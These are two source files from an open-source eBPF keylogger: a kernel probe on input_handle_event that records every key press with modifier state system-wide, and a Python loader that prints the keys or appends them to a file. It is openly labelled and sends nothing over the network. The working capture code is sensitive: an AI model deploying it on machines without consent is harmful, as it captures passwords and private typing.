File: src/bpf/bpf_program.c
/*
    bpf_keylogger: Log key presses and mouse button events systemwide using eBPF
    Copyright (C) 2019  William Findlay

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.
*/

#include <linux/input.h>
#include <uapi/linux/input-event-codes.h>

#include "src/bpf/bpf_program.h"
#include "src/bpf/helpers.h"

/* BPF maps below this line -------------------------------------- */

BPF_ARRAY(modifiers, u8, 4);

BPF_PERF_OUTPUT(keypresses);

/* BPF programs below this line ---------------------------------- */

/* https://github.com/torvalds/linux/blob/master/drivers/input/input.c */
int kprobe__input_handle_event(struct pt_regs *ctx, struct input_dev *dev,
                   unsigned int type, unsigned int code, int value)
{
    /* Modifiers */
    u8 *ctrl;
    u8 *shift;
    u8 *alt;
    u8 *meta;

    /* Keypress event */
    struct bkl_key_event kev = {};

    /* Filter keydown events */
    if (type == EV_KEY && value)
    {
#ifdef BKL_DEBUG
        bpf_trace_printk("key down %u\n", code);
#endif

        /* Lookup modifiers */
        int k = BKL_CTRL;
        ctrl = modifiers.lookup(&k);
        k = BKL_SHIFT;
        shift = modifiers.lookup(&k);
        k = BKL_ALT;
        alt = modifiers.lookup(&k);
        k = BKL_META;
        meta = modifiers.lookup(&k);

        /* handle lookup errors */
        if (!ctrl)
        {
            bpf_trace_printk("ERROR: Could not read ctrl modifier from array\n");
            return 0;
        }
        if (!shift)
        {
            bpf_trace_printk("ERROR: Could not read shift modifier from array\n");
            return 0;
        }
        if (!alt)
        {
            bpf_trace_printk("ERROR: Could not read alt modifier from array\n");
            return 0;
        }
        if (!meta)
        {
            bpf_trace_printk("ERROR: Could not read meta modifier from array\n");
            return 0;
        }

        /* Assign key code to event */
        kev.code = code;

        /* Assign modifiers to event */
        kev.ctrl = *ctrl;
        kev.shift = *shift;
        kev.alt = *alt;
        kev.meta = *meta;

        /* Submit event */
        keypresses.perf_submit(ctx, &kev, sizeof(kev));

        /* Maybe set modifiers */
        if (code == KEY_LEFTSHIFT || code == KEY_RIGHTSHIFT)
        {
            int k = BKL_SHIFT;
            u8 v = 1;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTCTRL || code == KEY_RIGHTCTRL)
        {
            int k = BKL_CTRL;
            u8 v = 1;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTALT || code == KEY_RIGHTALT)
        {
            int k = BKL_ALT;
            u8 v = 1;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTMETA || code == KEY_RIGHTMETA)
        {
            int k = BKL_META;
            u8 v = 1;
            modifiers.update(&k, &v);
        }
    }
    /* Filter keyup events */
    else if (type == EV_KEY && !value)
    {
#ifdef BKL_DEBUG
        bpf_trace_printk("key up %u\n", code);
#endif

        /* Maybe reset modifiers */
        if (code == KEY_LEFTSHIFT || code == KEY_RIGHTSHIFT)
        {
            int k = BKL_SHIFT;
            u8 v = 0;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTCTRL || code == KEY_RIGHTCTRL)
        {
            int k = BKL_CTRL;
            u8 v = 0;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTALT || code == KEY_RIGHTALT)
        {
            int k = BKL_ALT;
            u8 v = 0;
            modifiers.update(&k, &v);
        }
        if (code == KEY_LEFTMETA || code == KEY_RIGHTMETA)
        {
            int k = BKL_META;
            u8 v = 0;
            modifiers.update(&k, &v);
        }
    }

    return 0;
}

/* https://github.com/torvalds/linux/blob/master/drivers/input/input.c */
/* We probably don't have to worry about autorepeats for this simple example */
int kprobe__input_repeat_key(struct pt_regs *ctx)
{
#ifdef BKL_DEBUG
    bpf_trace_printk("repeat key!\n");
#endif

    return 0;
}

File: src/python/bpf_program.py
#  bpf_keylogger: Log key presses and mouse button events systemwide using eBPF
#  Copyright (C) 2019  William Findlay
#
#  This program is free software: you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation, either version 3 of the License, or
#  (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program.  If not, see <https://www.gnu.org/licenses/>.

import os, sys
import atexit
import signal
import time

from bcc import BPF

from defs import project_path, ticksleep
from keys import translate_keycode
from utils import drop_privileges

class BPFProgram():
    def __init__(self, args):
        self.bpf = None

        self.args = args

    @drop_privileges
    def open_file(self, *args, **kwargs):
        return open(*args, **kwargs)

    def register_exit_hooks(self):
        # Catch signals so we still invoke atexit
        signal.signal(signal.SIGTERM, lambda x, y: sys.exit(0))
        signal.signal(signal.SIGINT, lambda x, y: sys.exit(0))

        # Unregister self.cleanup if already registered
        atexit.unregister(self.cleanup)
        # Register self.cleanup
        atexit.register(self.cleanup)

    def cleanup(self):
        self.bpf = None

    def register_perf_buffers(self):
        def keypress(cpu, data, size):
            event = self.bpf["keypresses"].event(data)
            key = translate_keycode(event.code)
            if key:
                print(key)
                sys.stdout.flush()
        self.bpf["keypresses"].open_perf_buffer(keypress)

    def load_bpf(self):
        assert self.bpf == None

        # Set flags
        flags = []
        if self.args.debug:
            flags.append(f'-DBKL_DEBUG')

        with open(os.path.join(project_path, "src/bpf/bpf_program.c"), "r") as f:
            text = f.read()
            self.bpf = BPF(text=text, cflags=flags)
        self.register_exit_hooks()
        self.register_perf_buffers()

    def main(self):
        self.load_bpf()

        if self.args.outfile:
            sys.stdout = self.open_file(self.args.outfile, 'a+')

        print("Logging key presses... ctrl-c to quit", file=sys.stderr)

        while True:
            time.sleep(ticksleep)
            if self.args.debug:
                self.bpf.trace_print()
            self.bpf.perf_buffer_poll()
